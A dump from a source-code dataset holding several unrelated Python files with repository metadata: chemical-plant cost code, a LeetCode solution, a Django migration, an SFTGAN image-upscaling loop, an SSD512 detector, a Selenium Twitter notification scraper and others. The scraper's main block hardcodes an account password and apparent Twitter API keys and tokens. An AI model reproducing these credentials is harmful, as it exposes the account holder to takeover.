self.installed_costs = {}
self.F_M = {}
self.F_D = {}
self.F_P = {}
self.F_BM = {}
def _setup(self):
results = (self.baseline_purchase_costs, self.purchase_costs,
self.installed_costs, self.F_M, self.F_D, self.F_P,
self.F_BM)
for i in results: i.clear()
for i in self.heat_utilities: i.empty()
self.heat_utilities.clear()
self.power_utility.empty()
def _load_costs(self):
r"""
Calculate and save free on board (f.o.b.) purchase costs and
installed equipment costs (i.e. bare-module cost) for each item in the
:attr:`~Auxiliary.baseline_purchase_costs` dictionary.
Notes
-----
As explained in [1]_, the f.o.b. purchase cost is given by:
.. math::
C_{P} = C_{Pb}F_{D}F_{P}F_{M}
And the installed equipment cost is given by:
.. math::
C_{BM} = C_{Pb} (F_{BM} + F_{D}F_{P}F_{M} - 1)
Where:
* :math:`C_{Pb}`: Baseline purchase cost.
* :math:`F_{BM}`: Bare module factor.
* :math:`F_{D}`: Design factor.
* :math:`F_{P}`: Pressure factor.
* :math:`F_{M}`: Material factor.
Values for the bare-module, design, pressure, and material factors of
each equipment should be stored in the :attr:`~Auxiliary.F_BM`, :attr:`~Auxiliary.F_D`,
:attr:`~Auxiliary.F_P`, and :attr:`~Auxiliary.F_M` dictionaries.
Warning
-------
If an item is listed in the :attr:`~Auxiliary.purchase_costs` dictionary but not in the
:attr:`~Auxiliary.baseline_purchase_costs` dictionary, the baseline purchase cost is
assumed to be the same as the purchase cost.
References
----------
.. [1] Seider, W. D., Lewin, D. R., Seader, J. D., Widagdo, S., Gani, R., & Ng, M. K. (2017). Product and Process Design Principles. Wiley. Cost Accounting and Capital Cost Estimation (Chapter 16)
"""
F_BM = self.F_BM
F_D = self.F_D
F_P = self.F_P
F_M = self.F_M
baseline_purchase_costs = self.baseline_purchase_costs
purchase_costs = self.purchase_costs
installed_costs = self.installed_costs
# Load main costs
for i in purchase_costs:
if i not in baseline_purchase_costs:
baseline_purchase_costs[i] = purchase_costs[i]
for name, Cpb in baseline_purchase_costs.items():
if name in installed_costs and name in purchase_costs:
continue # Assume costs already added elsewhere using another method
F = F_D.get(name, 1.) * F_P.get(name, 1.) * F_M.get(name, 1.)
try:
installed_costs[name] = Cpb * (F_BM[name] + F - 1.)
except KeyError:
F_BM[name] = 1.
installed_costs[name] = purchase_costs[name] = Cpb * F
else:
purchase_costs[name] = Cpb * F
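# Worked example of the equations above (hypothetical numbers, not from
# BioSTEAM): with C_Pb = 1000, F_D = 1.2, F_P = 1.1, F_M = 1.5, F_BM = 2.0:
#   F    = F_D * F_P * F_M       = 1.98
#   C_P  = C_Pb * F              = 1980
#   C_BM = C_Pb * (F_BM + F - 1) = 2980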
|
[
"[email protected]"
] | |
8d949e06450535d4290d453381f9fea6c09f6263
|
b4af26ef6994f4cbb738cdfd182e0a992d2e5baa
|
/source/leetcode/2222/hyo.py
|
c1b25c1cdff34ac62d6631e0c46197bc05b08274
|
[] |
no_license
|
wisest30/AlgoStudy
|
6819b193c8e9245104fc52df5852cd487ae7a26e
|
112de912fc10933445c2ad36ce30fd404c493ddf
|
refs/heads/master
| 2023-08-08T17:01:12.324470 | 2023-08-06T11:54:15 | 2023-08-06T11:54:15 | 246,302,438 | 10 | 17 | null | 2021-09-26T13:52:18 | 2020-03-10T13:02:56 |
C++
|
UTF-8
|
Python
| false | false | 381 |
py
|
from collections import Counter
class Solution:
def numberOfWays(self, s: str) -> int:
right_cnts = Counter(s)
left_cnts = Counter()
ret = 0
for c in s :
right_cnts[c] -= 1
if c == '0' : ret += left_cnts['1'] * right_cnts['1']
else : ret += left_cnts['0'] * right_cnts['0']
left_cnts[c] += 1
return ret
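# Usage sketch (Counter imported above so the snippet runs standalone;
# expected result computed by hand):
#   Solution().numberOfWays("001101")  # -> 6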
|
[
"[email protected]"
] | |
052bbab1f6d426719015437fad0b7bdf83bbc0ac
|
648e5ea6722db2f29806e24f11cf169257dfc1c7
|
/blogsadmin/migrations/0005_auto__add_field_position_group.py
|
0ad40ed7325a477fce46b6380adef8c7a5a32b72
|
[] |
no_license
|
cash2one/doorscenter
|
30d4f65e3fb57c417df3f09d7feab721d8425faa
|
d2771bf04aa187dda6d468883a5a167237589369
|
refs/heads/master
| 2021-05-27T15:38:56.219907 | 2012-06-20T05:38:15 | 2012-06-20T05:38:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,504 |
py
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Position.group'
db.add_column('blogsadmin_position', 'group', self.gf('django.db.models.fields.CharField')(default='', max_length=200, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Position.group'
db.delete_column('blogsadmin_position', 'group')
models = {
'blogsadmin.blog': {
'Meta': {'object_name': 'Blog'},
'backLinksCount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'bulkAddBlogs': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'group': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'indexCount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'lastChecked': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'blogsadmin.position': {
'Meta': {'object_name': 'Position'},
'bingExtendedInfo': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'bingMaxPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'bingMaxPositionDate': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'bingPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'blog': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blogsadmin.Blog']"}),
'bulkAddKeywords': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'googleExtendedInfo': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'googleMaxPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'googleMaxPositionDate': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'googlePosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'group': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200'}),
'lastChecked': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'yahooExtendedInfo': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'yahooMaxPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'yahooMaxPositionDate': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'yahooPosition': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['blogsadmin']
|
[
"[email protected]"
] | |
47a97ab6d8d5f5548aebdd21309a93628a5ddc13
|
b9deb23923e6b4625ef04993b66d912594815a4c
|
/sftgan_handler.py
|
0211a66576337831f7602d0c65fc1e05907207de
|
[] |
no_license
|
previtus/SuperSuperSuperResolution
|
4491ae9ab9269a0be9a3fc5a3d47a5b72b09f5b0
|
98ef3017bcf1da4f73bedb29574d00af8f895cab
|
refs/heads/master
| 2021-11-18T20:01:27.757712 | 2021-09-17T13:22:35 | 2021-09-17T13:22:35 | 253,820,324 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,176 |
py
|
import os
import glob
import numpy as np
import cv2
import torch
import torchvision.utils
from os import listdir
from os.path import isfile, join
import sys
sys.path.append(r'SFTGAN/pytorch_test/')
#from SFTGAN.pytorch_test import architectures as arch
#from SFTGAN.pytorch_test import util as util
import architectures as arch
import util
def sftgan(load_name="", save_name = 'fin_rlt.png', mode = 'rgb', override_input = False):
path = load_name
test_img_folder_name = "TMP1"
# options
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
device = torch.device('cuda') # if you want to run on CPU, change 'cuda' -> 'cpu'
# device = torch.device('cpu')
# make dirs
test_img_folder = 'SFTGAN/data/' + test_img_folder_name # HR images
save_prob_path = 'SFTGAN/data/' + test_img_folder_name + '_segprob' # probability maps
save_byteimg_path = 'SFTGAN/data/' + test_img_folder_name + '_byteimg' # segmentation annotations
save_colorimg_path = 'SFTGAN/data/' + test_img_folder_name + '_colorimg' # segmentaion color results
util.mkdirs([save_prob_path, save_byteimg_path, save_colorimg_path])
test_prob_path = 'SFTGAN/data/' + test_img_folder_name + '_segprob' # probability maps
save_result_path = 'SFTGAN/data/' + test_img_folder_name + '_result' # results
util.mkdirs([save_result_path])
# load model
seg_model = arch.OutdoorSceneSeg()
seg_model_path = 'SFTGAN/pretrained_models/segmentation_OST_bic.pth'
seg_model.load_state_dict(torch.load(seg_model_path), strict=True)
seg_model.eval()
seg_model = seg_model.to(device)
# look_up table, RGB, for coloring the segmentation results
lookup_table = torch.from_numpy(
np.array([
[153, 153, 153], # 0, background
[0, 255, 255], # 1, sky
[109, 158, 235], # 2, water
[183, 225, 205], # 3, grass
[153, 0, 255], # 4, mountain
[17, 85, 204], # 5, building
[106, 168, 79], # 6, plant
[224, 102, 102], # 7, animal
[255, 255, 255], # 8/255, void
])).float()
lookup_table /= 255
print('Testing segmentation probability maps ...')
"""
for idx, path in enumerate(glob.glob(test_img_folder + '/*')):
imgname = os.path.basename(path)
basename = os.path.splitext(imgname)[0]
if "txt" in path:
continue
"""
idx = 0
if True:
#print(idx + 1, basename, path)
print(idx + 1)
# read image
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
img = util.modcrop(img, 8)
print("debug ", img.shape, img.ndim, )
if img.ndim == 2:
img = np.expand_dims(img, axis=2)
if mode == 'bw':
#print(img.shape) # w,h,3 <- 1
stacked_img = np.stack((img,)*3, axis=2) # bw -> rgb
stacked_img = stacked_img[:,:,:,0]
#print(stacked_img.shape) # w,h,3 <- 1
img = stacked_img
#(424, 1024, 3)
#print("debug img", img.shape, )
if override_input:
print("overriding input ", img.shape, "as", path)
util.save_img(img, path)
img = torch.from_numpy(np.transpose(img, (2, 0, 1))).float()
# MATLAB imresize
# You can use the MATLAB to generate LR images first for faster imresize operation
img_LR = util.imresize(img / 255, 1 / 4, antialiasing=True)
img = util.imresize(img_LR, 4, antialiasing=True) * 255
img[0] -= 103.939
img[1] -= 116.779
img[2] -= 123.68
img = img.unsqueeze(0)
img = img.to(device)
with torch.no_grad():
output = seg_model(img).detach().float().cpu().squeeze()
# save segmentation probability maps
#torch.save(output, os.path.join(save_prob_path, basename + '_bic.pth')) # 8xHxW
SEG_OUT = output
"""
# save segmentation byte images (annotations)
_, argmax = torch.max(output, 0)
argmax = argmax.squeeze().byte()
cv2.imwrite('foo1.png', argmax.numpy())
# save segmentation colorful results
im_h, im_w = argmax.size()
color = torch.FloatTensor(3, im_h, im_w).fill_(0) # black
for i in range(8):
mask = torch.eq(argmax, i)
color.select(0, 0).masked_fill_(mask, lookup_table[i][0]) # R
color.select(0, 1).masked_fill_(mask, lookup_table[i][1]) # G
color.select(0, 2).masked_fill_(mask, lookup_table[i][2]) # B
# void
mask = torch.eq(argmax, 255)
color.select(0, 0).masked_fill_(mask, lookup_table[8][0]) # R
color.select(0, 1).masked_fill_(mask, lookup_table[8][1]) # G
color.select(0, 2).masked_fill_(mask, lookup_table[8][2]) # B
torchvision.utils.save_image(
color, 'foo2.png', padding=0, normalize=False)
"""
del seg_model
'''
Codes for testing SFTGAN
'''
# options
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
sres_model_path = 'SFTGAN/pretrained_models/SFTGAN_torch.pth' # torch version
# sres_model_path = 'SFTGAN/pretrained_models/SFTGAN_noBN_OST_bg.pth' # pytorch version
device = torch.device('cuda') # if you want to run on CPU, change 'cuda' -> 'cpu'
# device = torch.device('cpu')
if 'torch' in sres_model_path: # torch version
model = arch.SFT_Net_torch()
else: # pytorch version
model = arch.SFT_Net()
model.load_state_dict(torch.load(sres_model_path), strict=True)
model.eval()
model = model.to(device)
print('Testing SFTGAN ...')
"""
for idx, path in enumerate(glob.glob(test_img_folder + '/*')):
imgname = os.path.basename(path)
basename = os.path.splitext(imgname)[0]
if "txt" in path:
continue
"""
if True:
        # `path` already holds the input file; the glob loop above is disabled.
#print(idx + 1, basename)
print(idx + 1)
# read image
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
img = util.modcrop(img, 8)
img = img * 1.0 / 255
if img.ndim == 2:
img = np.expand_dims(img, axis=2)
if mode == 'bw':
#print(img.shape) # w,h,3 <- 1
stacked_img = np.stack((img,)*3, axis=2) # bw -> rgb
stacked_img = stacked_img[:,:,:,0]
#print(stacked_img.shape) # w,h,3 <- 1
img = stacked_img
#(424, 1024, 3)
#print("debug img", img.shape, )
img = torch.from_numpy(np.transpose(img[:, :, [2, 1, 0]], (2, 0, 1))).float()
# MATLAB imresize
# You can use the MATLAB to generate LR images first for faster imresize operation
img_LR = util.imresize(img, 1 / 4, antialiasing=True)
img_LR = img_LR.unsqueeze(0)
img_LR = img_LR.to(device)
# read segmentation probability maps
#seg = torch.load(os.path.join(test_prob_path, basename + '_bic.pth'))
seg = SEG_OUT
seg = seg.unsqueeze(0)
# change probability
# seg.fill_(0)
# seg[:,5].fill_(1)
seg = seg.to(device)
with torch.no_grad():
output = model((img_LR, seg)).data.float().cpu().squeeze()
output = util.tensor2img(output)
util.save_img(output, save_name)
if __name__ == "__main__":
mypath = "superloop-sft/"
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
onlyfiles.sort()
last_file = onlyfiles[-1]
namelist = last_file.split("_")
int_num = int(namelist[0])
name = "_" + "_".join(namelist[1:])
print(name, int_num, "and last is", last_file, "from whole list of", onlyfiles)
path = mypath + last_file
print("opening", path)
print("=================================================================================================================")
loops = 100
print("Now looping for", loops)
for i in range(loops):
int_num += 1
save_as = "superloop-sft/"+str(int_num).zfill(6)+name
sftgan(load_name=path, save_name=save_as)
print('saved', save_as)
path = save_as
|
[
"[email protected]"
] | |
ecf372af2d6cf157af07fc00c931f935f1a252c8
|
696ac453ee30865980a9bd5a6fc25a1baa0f32ec
|
/ssd/models/ssd512.py
|
4aae987f027ee31be62081601a30161af0d183f9
|
[
"MIT"
] |
permissive
|
jjjkkkjjj/pytorch_SSD
|
b420f82c9be0de641b0da2100ee7f399b9d595bd
|
4082ea745e0ca3a95cf73a89d824cd11ceb7c180
|
refs/heads/master
| 2021-06-12T21:35:50.536971 | 2020-06-25T15:05:28 | 2020-06-25T15:05:28 | 254,406,062 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,406 |
py
|
from ..core.layers import *
from .base import SSDvggBase, SSDTrainConfig, SSDValConfig, load_vgg_weights
from ..core.boxes import *
from torch import nn
class SSD512(SSDvggBase):
def __init__(self, class_labels, input_shape=(512, 512, 3), batch_norm=False,
val_config=SSDValConfig(val_conf_threshold=0.01, vis_conf_threshold=0.6, iou_threshold=0.45, topk=200)):
"""
:param class_labels: list or tuple of str
:param input_shape: tuple, 3d and (height, width, channel)
:param batch_norm: bool, whether to add batch normalization layers
"""
### train_config ###
if not batch_norm:
train_config = SSDTrainConfig(class_labels=class_labels, input_shape=input_shape, batch_norm=batch_norm,
aspect_ratios=((1, 2), (1, 2, 3), (1, 2, 3), (1, 2, 3), (1, 2, 3), (1, 2), (1, 2)),
classifier_source_names=('convRL4_3', 'convRL7', 'convRL8_2', 'convRL9_2', 'convRL10_2', 'convRL11_2', 'convRL12_2'),
addon_source_names=('convRL4_3',),
codec_means=(0.0, 0.0, 0.0, 0.0), codec_stds=(0.1, 0.1, 0.2, 0.2),
rgb_means=(0.485, 0.456, 0.406), rgb_stds=(0.229, 0.224, 0.225))
else:
train_config = SSDTrainConfig(class_labels=class_labels, input_shape=input_shape, batch_norm=batch_norm,
aspect_ratios=((1, 2), (1, 2, 3), (1, 2, 3), (1, 2, 3), (1, 2, 3), (1, 2), (1, 2)),
classifier_source_names=('convBnRL4_3', 'convBnRL7', 'convBnRL8_2', 'convBnRL9_2', 'convBnRL10_2', 'convRLBn11_2', 'convRL12_2'),
addon_source_names=('convBnRL4_3',),
codec_means=(0.0, 0.0, 0.0, 0.0), codec_stds=(0.1, 0.1, 0.2, 0.2),
rgb_means=(0.485, 0.456, 0.406), rgb_stds=(0.229, 0.224, 0.225))
### layers ###
Conv2d.batch_norm = batch_norm
vgg_layers = [
*Conv2d.relu_block('1', 2, train_config.input_channel, 64),
*Conv2d.relu_block('2', 2, 64, 128),
*Conv2d.relu_block('3', 3, 128, 256, pool_ceil_mode=True),
*Conv2d.relu_block('4', 3, 256, 512),
*Conv2d.relu_block('5', 3, 512, 512, pool_k_size=(3, 3), pool_stride=(1, 1), pool_padding=1),
# replace last maxpool layer's kernel and stride
# Atrous convolution
*Conv2d.relu_one('6', 512, 1024, kernel_size=(3, 3), padding=6, dilation=6),
*Conv2d.relu_one('7', 1024, 1024, kernel_size=(1, 1)),
]
extra_layers = [
*Conv2d.relu_one('8_1', 1024, 256, kernel_size=(1, 1)),
*Conv2d.relu_one('8_2', 256, 512, kernel_size=(3, 3), stride=(2, 2), padding=1),
*Conv2d.relu_one('9_1', 512, 128, kernel_size=(1, 1)),
*Conv2d.relu_one('9_2', 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=1),
*Conv2d.relu_one('10_1', 256, 128, kernel_size=(1, 1)),
*Conv2d.relu_one('10_2', 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=1),
*Conv2d.relu_one('11_1', 256, 128, kernel_size=(1, 1)),
*Conv2d.relu_one('11_2', 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=1),
*Conv2d.relu_one('12_1', 256, 128, kernel_size=(1, 1)),
*Conv2d.relu_one('12_2', 128, 256, kernel_size=(4, 4), stride=(1, 1), padding=1),
            # if batch_norm=True, an error is thrown; the last layer's channel == 1 may be the cause
]
vgg_layers = nn.ModuleDict(vgg_layers)
extra_layers = nn.ModuleDict(extra_layers)
super().__init__(train_config, val_config, defaultBox=DBoxSSDOriginal(img_shape=input_shape,
scale_conv4_3=0.07, scale_range=(0.15, 0.9),
aspect_ratios=train_config.aspect_ratios),
vgg_layers=vgg_layers, extra_layers=extra_layers)
def load_vgg_weights(self):
if self.batch_norm:
load_vgg_weights(self, 'vgg16_bn')
else:
load_vgg_weights(self, 'vgg16')
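# Usage sketch (illustrative class labels, not from the original repo):
# model = SSD512(class_labels=('person', 'car', 'dog'))
# model.load_vgg_weights()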
|
[
"[email protected]"
] | |
669f9df4e9dd7d4445d619a9df31513eff7f9760
|
2aed68d1ee14eb3fc344fe1e0db99b20f0c9a166
|
/xnr/twitter/feedback_like.py
|
1eb22b5a4e7e5a77903c88e07cd9307c7264e97f
|
[] |
no_license
|
zhhhzhang/xnr1
|
a8ab151d99e74124eae2ec15c61281a32cb9ce8d
|
bfa621916c9a787bcdff4573a06d12056e25c556
|
refs/heads/master
| 2020-03-19T04:56:22.330912 | 2018-05-30T12:00:12 | 2018-05-30T12:00:12 | 135,883,486 | 0 | 1 | null | 2018-06-03T07:35:36 | 2018-06-03T07:35:35 | null |
UTF-8
|
Python
| false | false | 2,408 |
py
|
#!/usr/bin/env python
#encoding: utf-8
from launcher import Launcher
from Elasticsearch_tw import Es_twitter
import time
class Like():
def __init__(self, username, password, consumer_key, consumer_secret, access_token, access_secret):
self.launcher = Launcher(username, password, consumer_key, consumer_secret, access_token, access_secret)
self.driver = self.launcher.login()
self.es = Es_twitter()
self.api = self.launcher.api()
self.driver.get('https://twitter.com/i/notifications')
time.sleep(2)
self.lis = self.driver.find_elements_by_xpath('//li[@data-item-type="activity"]')
self.list = []
self.update_time = int(time.time())
def get_like(self):
try:
for li in self.lis:
type = li.get_attribute('data-component-context')
if type == "favorite_activity":
user_name = li.find_element_by_xpath('./div/div/div/div[2]/div[1]/a/strong').text
                    screen_name = li.find_element_by_xpath('./div/div/div/div[2]/div[1]/a').get_attribute('href').replace('https://twitter.com/','')
timestamp = li.find_element_by_xpath('./div/div/div/div[2]/div[1]/div[1]/div/span').get_attribute('data-time')
user_id = li.find_element_by_xpath('./div/div/div/div[2]/div[1]/a').get_attribute('data-user-id')
root_user_id = li.find_element_by_xpath('./div/div/div/div[2]/div[2]/div/div/div').get_attribute('data-user-id')
root_content = li.find_element_by_xpath('./div/div/div/div[2]/div[2]/div/div/div/div/div/div[2]').text
mid = li.get_attribute('data-item-id')
photo_url = li.find_element_by_xpath('./div/div/div/div[2]//img').get_attribute('src')
item = {
'uid':user_id,
'photo_url':photo_url,
'user_name':screen_name,
'nick_name':user_name,
'timestamp':int(timestamp),
'text':root_content,
'update_time':self.update_time,
'root_text':root_content,
'root_mid':mid
}
self.list.append(item)
finally:
self.driver.close()
return self.list
def save(self,indexName,typeName,list):
self.es.executeES(indexName,typeName,list)
if __name__ == '__main__':
like = Like('[email protected]', 'zyxing,0513', 'N1Z4pYYHqwcy9JI0N8quoxIc1', 'VKzMcdUEq74K7nugSSuZBHMWt8dzQqSLNcmDmpGXGdkH6rt7j2', '943290911039029250-yWtATgV0BLE6E42PknyCH5lQLB7i4lr', 'KqNwtbK79hK95l4X37z9tIswNZSr6HKMSchEsPZ8eMxA9')
list = like.get_like()
print(list)
#like.save('twitter_feedback_like','text',list)
|
[
"[email protected]"
] | |
0375651712e4ca4f0a688682437e8c6a0263b53c
|
55c24645dd63a1c41037dcfb9fb45bc7bcdea4be
|
/venv/lib/python3.7/site-packages/virtualenv/info.py
|
d93b549be167f5959986545dde548e4456d6340c
|
[] |
no_license
|
abdullah-nawaz/flask-boilerplate
|
7c42801a21ee3e6a647cc8a7d92e0285f8e86cad
|
01bc7fe1140e8ec613de4a38546a07ddfbdbd254
|
refs/heads/master
| 2022-12-02T05:06:08.297759 | 2020-06-24T21:36:32 | 2020-06-24T21:36:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,957 |
py
|
from __future__ import absolute_import, unicode_literals
import logging
import os
import platform
import sys
import tempfile
IMPLEMENTATION = platform.python_implementation()
IS_PYPY = IMPLEMENTATION == "PyPy"
IS_CPYTHON = IMPLEMENTATION == "CPython"
PY3 = sys.version_info[0] == 3
PY2 = sys.version_info[0] == 2
IS_WIN = sys.platform == "win32"
ROOT = os.path.realpath(
os.path.join(os.path.abspath(__file__), os.path.pardir, os.path.pardir)
)
IS_ZIPAPP = os.path.isfile(ROOT)
WIN_CPYTHON_2 = IS_CPYTHON and IS_WIN and PY2
_CAN_SYMLINK = _FS_CASE_SENSITIVE = _CFG_DIR = _DATA_DIR = None
def fs_is_case_sensitive():
global _FS_CASE_SENSITIVE
if _FS_CASE_SENSITIVE is None:
with tempfile.NamedTemporaryFile(prefix="TmP") as tmp_file:
_FS_CASE_SENSITIVE = not os.path.exists(tmp_file.name.lower())
logging.debug(
"filesystem is %scase-sensitive", "" if _FS_CASE_SENSITIVE else "not "
)
return _FS_CASE_SENSITIVE
def fs_supports_symlink():
global _CAN_SYMLINK
if _CAN_SYMLINK is None:
can = False
if hasattr(os, "symlink"):
if IS_WIN:
with tempfile.NamedTemporaryFile(prefix="TmP") as tmp_file:
temp_dir = os.path.dirname(tmp_file.name)
dest = os.path.join(temp_dir, "{}-{}".format(tmp_file.name, "b"))
try:
os.symlink(tmp_file.name, dest)
can = True
except (OSError, NotImplementedError):
pass
logging.debug("symlink on filesystem does%s work", "" if can else " not")
else:
can = True
_CAN_SYMLINK = can
return _CAN_SYMLINK
__all__ = (
"IS_PYPY",
"IS_CPYTHON",
"PY3",
"PY2",
"IS_WIN",
"fs_is_case_sensitive",
"fs_supports_symlink",
"ROOT",
"IS_ZIPAPP",
"WIN_CPYTHON_2",
)
|
[
"[email protected]"
] | |
c385ced724613b09d739b2c164df6dc0a7c9fb32
|
6fe8250e67e46808a0f297abd38b49f65050336d
|
/tests/integration/__init__.py
|
13b945a3c4201a757520391da34446dd3f96baf2
|
[] |
no_license
|
pitymaia/pluserable
|
854fb6f220e744de87126f6a3e6429f8d1c60546
|
7a7656e66c894bc7981d6193354357014b3307c3
|
refs/heads/master
| 2020-08-31T08:37:45.917498 | 2019-10-22T20:23:17 | 2019-10-22T20:23:17 | 218,649,739 | 0 | 0 | null | 2019-10-31T00:09:41 | 2019-10-31T00:09:40 | null |
UTF-8
|
Python
| false | false | 1,152 |
py
|
"""An integration test goes through several layers of production code.
It accesses a database, so it is slower than a unit test.
"""
from bag.sqlalchemy.tricks import SubtransactionTrick
from kerno.web.pyramid import IKerno
from pyramid import testing
from sqlalchemy.orm import sessionmaker
from tests import AppTestCase, _make_eko
class IntegrationTestBase(AppTestCase):
"""Enclose each test in a subtransaction and roll it back."""
def setUp(self):
"""Set up each test."""
self.subtransaction = SubtransactionTrick(
engine=self.engine, sessionmaker=sessionmaker)
self.sas = self.subtransaction.sas # TODO REMOVE
def sas_factory():
return self.subtransaction.sas
self.kerno = _make_eko(sas_factory=sas_factory).kerno
self.repo = self.kerno.new_repo()
config = testing.setUp(settings=self.settings)
config.registry.registerUtility(self.kerno, IKerno)
config.include('pluserable')
self.config = config
def tearDown(self):
"""Clean up after each test."""
testing.tearDown()
self.subtransaction.close()
|
[
"[email protected]"
] | |
40a96d6da20ca24cb48bf2ecfa5d1d8e91736e5c
|
787ca5f82814a58c63cf3d8c0ec02082c40420de
|
/sbfury/golpe.py
|
44f94c69909c812085dd0cff319e7226e67c4fad
|
[] |
no_license
|
hugoruscitti/sbfury
|
72e586354b7cb88532bcfbe5705a66b1008710cb
|
474ce8304c45e63214184cde50f2976724fd8455
|
refs/heads/master
| 2020-06-29T19:03:25.284388 | 2013-01-02T04:15:09 | 2013-01-02T04:15:09 | 4,811,263 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,851 |
py
|
# -*- encoding: utf-8 -*-
# Shaolin's Blind Fury
#
# Copyright: Hugo Ruscitti
# Web: www.losersjuegos.com.ar
import pilas
from configuracion import DEPURACION
import efecto_golpe
import random
class Golpe(pilas.actores.Actor):
"""Representa un golpe (invisible) que un actor emite a otro."""
def __init__(self, actor, enemigos, dx, dy):
pilas.actores.Actor.__init__(self)
self.imagen = 'colision.png'
self.actor = actor
self.dx = dx
self.dy = dy
self.enemigos = enemigos
self.actualizar()
def actualizar(self):
if self.actor.espejado:
self.x = self.actor.x - 70 - self.dx
else:
self.x = self.actor.x + 70 + self.dx
self.y = self.actor.y + self.actor.altura_del_salto + self.dy
def verificar_colisiones(self):
for enemigo in self.enemigos:
area = [
enemigo.izquierda + 10,
enemigo.derecha - 10,
enemigo.abajo,
enemigo.arriba,
]
if enemigo.puede_ser_golpeado:
                # horizontal and vertical collision of a box against a point.
if area[0] < self.x < area[1] and area[2] < self.y < area[3]:
                    # checking that they are almost on the same z plane.
if abs(enemigo.y - self.actor.y) < 15:
if enemigo.altura_del_salto < 80:
self.crear_efecto_de_golpe()
return enemigo
def dibujar(self, aplicacion):
if DEPURACION:
pilas.actores.Actor.dibujar(self, aplicacion)
def crear_efecto_de_golpe(self):
dx = random.randint(-10, 10)
dy = random.randint(-10, 10)
efecto_golpe.EfectoGolpe(self.x + dx, self.y + dy)
|
[
"[email protected]"
] | |
01509e3cb94f4932fe35bb4db8fbf15445461508
|
81eceea57d570fa1f9f6468875b1b06b8de9f0f0
|
/.history/block_20200624172716.py
|
ca5c135349d1728a51d30bcf28a737626975d11e
|
[] |
no_license
|
digg2414/python-blockchain
|
fe9cdab754123eddef660c39ffb4c0c6b0e99523
|
36c4df03bdd71dbd58663ee4b16f6a72f02d401f
|
refs/heads/master
| 2022-11-05T01:08:44.229492 | 2020-06-24T23:11:41 | 2020-06-24T23:11:41 | 274,786,987 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 841 |
py
|
import time
def mine_block(last_block, data):
    """
    Mine a block based on the last_block and the data.
    """
    # Sketch completion of this work-in-progress file (the original left a
    # dangling `times_stamp` token): a placeholder hash is used here since
    # no hashing helper exists yet in this snapshot.
    timestamp = time.time_ns()
    return Block(timestamp, last_block.hash, data, f'{timestamp}-{last_block.hash}')
class Block():
"""
Block: a unit of storage.
Store transactions in a blockchain that supports a cryptocurrency.
"""
def __init__(self, timestamp, last_hash ,data, hash):
self.data = data
self.timestamp = timestamp
self.last_hash = last_hash
self.hash = hash
def __repr__(self):
return (
'Block: ('
f'timestamp: {self.timestamp}, '
f'last_hash: {self.last_hash}, '
f'hash: {self.hash}, '
            f'data: {self.data})'
)
def main():
    # Placeholder genesis block so the demo runs (values are arbitrary).
    genesis = Block(time.time_ns(), 'genesis_last_hash', 'genesis_data', 'genesis_hash')
    block = mine_block(genesis, 'foo')
    print(block)
print(f'block.py __name__: {__name__}')
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
f5f7b157ea9d5a2354c0805cea334cfac3408e7b
|
0a4031c062c098811c3b419b94ccf96724439107
|
/json-quiz/3.py
|
3792c2d4d8cd12eef82fce1a96bcc06d32b59ffc
|
[] |
no_license
|
dflatow/compjour-hw
|
d934ac6b9d22ca923100d023809fa32103e8e74a
|
4a26854769c31536247acb41b35f32fb55ab1e59
|
refs/heads/master
| 2020-05-05T03:17:49.699470 | 2015-06-02T02:15:55 | 2015-06-02T02:15:55 | 33,497,085 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 662 |
py
|
import requests
import json
